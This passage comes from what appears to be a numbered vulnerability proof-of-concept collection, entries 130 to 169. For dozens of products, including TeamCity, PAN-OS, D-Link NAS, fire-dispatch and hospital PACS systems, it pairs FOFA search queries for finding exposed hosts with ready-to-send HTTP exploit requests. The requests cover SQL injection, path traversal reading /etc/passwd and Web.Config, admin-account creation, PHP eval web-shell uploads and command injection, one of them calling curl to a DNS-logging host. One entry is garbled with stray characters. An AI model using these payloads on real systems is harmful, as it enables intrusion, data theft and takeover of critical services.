GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system: arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier: authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway: SQL injection in index.php
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway: SQL injection in list_ipAddressPolicy.php
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform: SQL injection in down_file.php
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform: SQL injection in pwd_update.php
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform: SQL injection in editemedia.php
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform: SQL injection in get_extension_yl.php
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun communication command and dispatch management platform: SQL injection in ajax_users.php
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform: weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard: remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page: arbitrary file upload via file.php
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected: TBK DVR-4104, TBK DVR-4216
The mdc parameter of /device.rsp is passed to a shell; the PoC sends only the cookie uid=1, no login.
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

Worked request; decoded, mdc is: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The file body is only a marker string; the upload is stored under its original name at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
Probe: a backslash-escaped quote in contenthistid; compare the response with a plain value. Entry 187 below gives the time-based form of the same bug.
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
The SOAP jobUpload operation accepts any file name, including .asmx, so an uploaded handler is executed by the server.
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

bufValue carries the file content (PAYLOAD stands for the omitted content, as explained in the introduction). The uploaded handler is then reached at:
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

. ^5 ]! l4 `9 Q5 k. s0 t/ s160. Sonatype Nexus Repository 3目录遍历与文件读取
: S! T9 y/ |' [CVE-2024-4956
5 X8 \* ?- I( k9 ]! GFOFA:title="Nexus Repository Manager"7 ~! s  a3 u- h5 h) O- O8 F# R
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
: N: b* W- I6 J' g' V2 `Host: x.x.x.x  t$ n4 W+ ]% j3 f8 n
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
6 C2 t$ c- u* F  d; D! A, b1 S/ wConnection: close$ i7 o& t: T6 S# N1 l
Accept: */*
2 z, Q% [( F" X( f- F8 N3 NAccept-Language: en$ \* o) u5 k0 \: y: P  c% w5 n% k: u
Accept-Encoding: gzip
3 a1 v9 w) s4 h/ _- S8 J% D8 i$ {3 B4 J

161. 科拓 intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> element sets the file name (the ../ prefix places it in the web root) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the uploaded file:
http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
The remotePath field chooses the target directory and the file keeps its .aspx name.
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
UEditor-style upload controller (action=image); note that the file name is also sent in a separate name field.
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
The upload is stored under a fixed name (update.aspx); the test page below prints a marker and then deletes itself.
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
The injection point is the sortOrder parameter (the URL is truncated in the source):
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
Error-based (sqlmap-style) probe on solutionNo. Decoded, the value is ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- bErE; the CHAR() chain spells "hello", which comes back inside the SQL Server conversion error.
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host: x.x.x.x
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system (LVS) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
The p parameter is joined to the UploadFile directory without normalisation, so ../ reaches Web.Config (connection strings, machine keys).
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
The path parameter is an encoded file reference (the PoC value below is taken as published).
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
Time-based blind (SQL Server WAITFOR DELAY) on the id parameter. The /templates/attestation/../../ prefix is how the PoC reaches the endpoint: keep the .. segments literal (curl --path-as-is), since HTTP clients normalise them away.
